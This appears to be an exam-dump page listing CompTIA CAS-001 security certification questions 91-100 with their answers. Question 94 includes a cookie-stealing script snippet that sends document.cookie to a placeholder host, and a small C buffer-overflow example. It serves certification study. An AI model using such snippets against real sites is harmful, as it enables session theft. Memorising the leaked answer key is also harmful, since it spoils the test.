[Free] Download New Latest (November) CompTIA CAS-001 Actual Tests 91-100

Ensurepass

QUESTION 91

An administrator is reviewing a recent security audit and determines that two users in finance also have access to the human resource data. One of those users fills in for any HR employees on vacation, the other user only works in finance. Which of the following policies is being violated by the finance user according to the audit results?

 

A.

Mandatory vacation

B.

Non-disclosure

C.

Job rotation

D.

Least privilege

 

Correct Answer: D

 

 

QUESTION 92

A security manager has provided a Statement of Work (SOW) to an external penetration testing firm for a web application security test. The web application starts with a very simple HTML survey form with two components: a country selection dropdown list and a submit button. The penetration testers are required to provide their test cases for this survey form in advance. In order to adequately test the input validation of the survey form, which of the following tools would be the BEST tool for the technician to use?

 

A.

HTTP interceptor

B.

Vulnerability scanner

C.

Port scanner

D.

Fuzzer

 

Correct Answer: A

 

 

QUESTION 93

An employee was terminated and promptly escorted to their exit interview, after which the employee left the building. It was later discovered that this employee had started a consulting business using screen shots of their work at the c
ompany which included live customer data. This information had been removed through the use of a USB device. After this incident, it was determined a process review must be conducted to ensure this issue does not recur. Which of the following business areas should primarily be involved in this discussion? (Select TWO).

 

A.

Database Administrator

B.

Human Resources

C.

Finance

D.

Network Administrator

E.

IT Management

 

Correct Answer: BE

 

QUESTION 94

Which of the following displays an example of a buffer overflow attack?

 

A.

<SCRIPT>

document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie

</SCRIPT>

B.

Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc

e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz

d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz

ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb

7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb

b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C.

#include

char *code = “AAAABBBBCCCCDDD”; //including the character ‘’ size = 16 bytes void main()

{char buf[8];

strcpy(buf, code);

}

D.

<form action=”/cgi-bin/login” method=post>

Username: <input type=text name=username>

PassworD.<input type=password name=password>

<input type=submit value=Login>

 

Correct Answer: C

 

 

QUESTION 95

A security administrator of a large private firm is researching and putting together a proposal to purchase an IPS. The specific IPS type has not been selected, and the security administrator needs to gather information from several vendors to determine a specific product. Which of the following documents would assist in choosing a specific brand and model?

 

A.

RFC

B.

RTO

C.

RFQ

D.

RFI

 

Correct Answer: D

 

 

QUESTION 96

The Chief Information Officer (CIO) comes to the security manager and asks what can be done to reduce the potential of sensitive data being emailed out of the company. Which of the following is an active security measure to protect against this threat?

 

A.

Require a digital signature on all outgoing emails.

B.

Sanitize outgoing content.

C.

Implement a data classification policy.

D.

Implement a SPAM filter.

 

Correct Answer: B

 

 

 

 

QUESTION 97

A certain script was recently altered by the author to meet certain security requirements, and needs to be executed on several critical servers. Which of the following describes the process of ensuring that the script being used was not altered by anyone other than the author?

 

A.

Digital encryption

B.

Digital signing

C.

Password entropy

D.

Code signing

 

Correct Answer: D

 

 

QUESTION 98

A company has decided to use the SDLC for the creation and production of a new information system. The security administrator is training all users on how to protect company information while using the new system, along with being able to recognize social engineering attacks. Senior Management must also formally approve of the system prior to it going live. In which of the following phases would these security controls take place?

 

A.

Operations and Maintenance

B.

Implementation

C.

Acquisition and Development

D.

Initiation

 

Correct Answer: B

 

 

QUESTION 99

A company provides on-demand virtual computing for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for access to sensitive data. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data was found on a hidden directory within the hypervisor. Which of the following has MOST likely occurred?

 

A.

A stolen two factor token and a memory mapping RAM exploit were used to move data from one virtual guest to an unauthorized similar token.

B.

An employee with administrative access to the virtual guests was able to dump the guest memory onto their mapped disk.

C.

A host server was left un-patched and an attacker was able to use a VMEscape attack to gain unauthorized access.

D.

A virtual guest was left un-patched and an attacker was able to use a privilege escalation attack to gain unauthorized access.

 

Correct Answer: C

 

 

QUESTION 100

Which of the following is the MOST cost-effective solution for sanitizing a DVD with sensitive information on it?

 

A.

Write over the data

B.

Purge the data

C.

Incinerate the DVD

D.

Shred the DVD

 

Correct Answer: D

 

Free VCE & PDF File for CompTIA CAS-001 Actual Tests

Instant Access to Free VCE Files: CompTIA | VMware | SAP …
Instant Access to Free PDF Files: CompTIA | VMware | SAP …

This entry was posted in CAS-001 Actual Tests (November) and tagged , , , , , , . Bookmark the permalink.